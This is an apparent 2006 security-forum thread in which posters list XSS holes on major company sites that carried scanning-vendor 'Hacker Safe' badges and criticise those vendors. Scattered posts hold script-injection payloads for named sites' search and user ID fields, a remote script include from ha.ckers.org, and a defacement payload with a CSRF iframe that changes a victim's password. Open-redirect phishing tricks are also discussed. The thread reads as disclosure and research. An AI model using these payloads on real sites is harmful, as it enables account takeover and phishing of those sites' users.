At least Johnson & Johnson [www.jnj.com] has sla.ckers on it's lame-ass map.

[www.jnj.com]

- RSnake
Gotta love it. http://ha.ckers.org

[www.jnj.com] XSS on that page too! :P

Beat me too it by a second. :(

- Kyran



Edited 1 time(s). Last edit at 11/11/2006 04:02AM by Kyran.

Excellent! aww!

Quote:

A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.
Kelly Jackson Higgins

says who?

[www.aetv.com]
[www.acehardware.com]
[www.redcross.org]
[www.investor.fnf.com]
[www.gnc.com]
[www.hp.com]
[www.jnj.com]
[www.nike.com]
[investor.northropgrumman.com]
[www.petco.com]
[www.ritzcamera.com]
[b2b.sony.com]
[www.sportsauthority.com]
[extsearch.worldbank.org]
[reservations.uhaul.com] FF only
[www.visacemea.com] sorry. visa.com was unpossible. this is their eastern europe domain
[www2.warnerbros.com]
[us.f275.mail.yahoo.com]

-maluc



Edited 2 time(s). Last edit at 11/11/2006 07:27AM by maluc.

Haha Nice job. I tryed VISA also, haven't found anthyng yet, there using mostly plain html (which they should). ^-^

well nothing is impossible i guess..

[www.usa.visa.com]

Edit: forgot to add defer :x

-maluc



Edited 2 time(s). Last edit at 11/11/2006 11:09AM by maluc.

At first look that looks like all of them.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Wow! That's incredible. Not totally unexpected, but still, pretty amazing. Nice job, Maluc. That's a pretty solid argument you've made.

- RSnake
Gotta love it. http://ha.ckers.org

Yep, job done. Still i wonder what ScanAlert awnser on it meant: "We encourage them". It's a pitty, i really want to inject some SQL at such sites, and go beyond the web-application layer to disprove them at least on the first 3 scan levels. but that's a bridge too far for me.

After reading the whitepaper of ScanAlert, and the methods they use, i get more questions everytime i read it then good awnsers, like they say something like: "Hacker safe doesn't need to be installed on the server, it does it remote." so essentially it's a small "Dos" app that is pinging ports, firewall, and other snake-oil tactics: 'Cuzz most servers have only a few open ports these days, we're not in the telnet era anymore.

But i wonder, if they do it remote, then they only scan the web application layer, 'cause how is it going to cross the firewall to do some REAL penetration testing? pitty them guys aren't here to awnser the questionaire.

From one of our anonymous lurkers:

Easy to find XSS in Scan Alert customer websites

Interstate Batteries
[www.interstatebatteries.com]

Fredericks of Hollywood
[secureweb.fredericks.com]

ABES of Maine
[www.abesofmaine.com]

Illuminations
[www.illuminations.com]

A&E Entertainment
[www.aetv.com]

Yankee Candle
[www.yankeecandle.com]

PacSun
[search.pacsun.com]

Cabela's
[www.cabelas.com]

KitchenAid
[www.shopkitchenaid.com]

Lilian Vernon
[search.lillianvernon.com]

- RSnake
Gotta love it. http://ha.ckers.org

[shop.2checkout.com]

search: "><script>alert('xss');</script>

[www.haveninternet.com]

search: <script>alert('xss');</script>

[www06.sbc.com]

UserID: "><script>alert('xss');</script>



Edited 4 time(s). Last edit at 11/11/2006 10:55PM by sjensen.

[www.haworthpress.com]

[www.shoplet.com]

well it seems visa webmasters don't work on the weekends, but they fixed both of those holes on the same day they found out about it .. their track record is still some of the speediest i've seen

so a tip of the hat to them..

-maluc

Yes seems fixed, i also like how they protect url breadcrumb structure with them pipes | and also the redirect protection where they check the given url and render it "phishing" if not matched. i have not tried to obfuscate it with all methods, and maybe it will fail on such thing: "http://visa.com@DWORD/phishing.php" or such, thats hard to match unless they use whitelisting.

they do use whitelisting, by domain. They previously whitelisted google.com and since google has an open redirect.. it left them a indirect open redirect [sla.ckers.org]

Still just as useful for phishing. But any other whitelisted domains with either an openredirect or an XSS hole (like infonow.net) can turn it back into an open redirect. Although perhaps less effective since XSS ones will usually make the XSSd page appear briefly before execution

-maluc

[search.ridegear.com];

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

control scan and hacker safe are stupid companies that think they know code.


btw, can you do anything besides make javascript alerts on hacker safe sites? insert some content into it! i would if i could code js! (im savvy in C++, HTML, CSS, etc.)

Sure, it possible.

Though the simple XSS alert is only to show the proof of concept. RSnake has some scripts to "pseudo deface" a site when the script is executes in the URI, some do post it here now and then. never seen it? it's pretty funny.

Well both companies are essentially a nessus scan (or nessus clone) .. they look for flaws in 3rd party web applications.. and webservers/ftpservers. What they don't seem to do, is look for web app holes (XSS,SQL,PHP injections) in custom web pages like the ones the site's webmaster personally made. Acunetix's WebScanner does find those holes .. but it seems to not be too thorough since their own website has had multiple XSS vulnerabilities.

Scanalert is certainly in the wrong here. They claim to find XSS/SQL holes when they certainly do a poor job of it - i've yet to see a site that uses them which is free from XSS. Control Code, however, is pretty upfront that they're a repackaged nessus scan and therefore doesn't find custom web app flaws - so they should escape some of that blame.

And unfortunately, the bulk of their clients are mom and pop websites - where the neighbor's son whose good with computers is their web master.. Even when they notify them of flaws, they're likely not able to fix things more complicated than 'download the new version' fixes. Hell, most professional webdesigners and sysadmins don't know how to properly sanitize web apps - they know how to reinstall windows, run nmap, and add banned IPs to firewalls =.=

-maluc

and yes, the script RSnake made for it is using:

<script src=http://ha.ckers.org/s.js></script>

-maluc

"pseudo deface"

so what exactly does that do?

adam

it overwrites the document that the victim sees generated by their browser..
using the equivalent of

<script>document.body.innerHTML='new page html'</script>

so it's only modifying what the victim sees client-side. Nothing is rewritten on the web server itself. That is, unless you send commands to it with the victims access level using CSRF. For example, sending a request to 'Change Password to spaghetti' by injecting an iframe

<script>document.body.innerHTML='new page<iframe src="http://thatsite.com/changepass.php?newpass=spaghetti&confirm=spaghetti"></iframe>'</script>

So using that Stallowned page, you didn't actually 'hack' any server as nothing was changed on it and you didn't have root access to it. The legality of it is quite controversial right now.

-maluc

[www.lockpickshop.com]

Havent any xss to add, i just thought i'd also like to say that overall in comparison to most boards there are alot of very skilled people on here and it feels good to be part of such a knowledgeable community of people that have the same interest and actually know what theyre talking about.

thanks.. and might i say your lips feel quite nice upon my bum. And so deserving after recently being honored as Time magazine's Man of The Year.. ^^


but you're right, i'm quite pleased with the quality of discussion here. Although it may've slowed my productivity for the worse, i think it's a vital resource for the community - who probably, like me, don't enjoy sifting through all the useless crap clogging other sec forums .-.

kinda surprising considering this forum is unmoderated.. hope it lasts.

-maluc

Come to think of it...this forum has maintained it's integrity with little or no moderation. I bet RSnake has some super secret script running to save us from spam and idiots.

if(user == idiot){
doBan(user)
}

?

- Kyran

Yah, it's called laziness.sh Here's the psuedocode:

use email->verification;

if (someone_posts) {
read $it['sometime_later'];
do nothing;
}

if (post_ends_up_annoying_me) {
delete $it;
} elsif (post_ends_up_in_my_inbox_cuz_it_annoyed_someone_else) {
delete $it;
ban $ip;
if (got_nothing_better_to_do == true) {
plan->retribution_on($ip);
}
}

It's rough, but it works. ;)

- RSnake
Gotta love it. http://ha.ckers.org

[www.roomstogo.com]

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

[www.shoppbs.org]

nEUrOO -- [rgaucher.info] -- [twitter.com]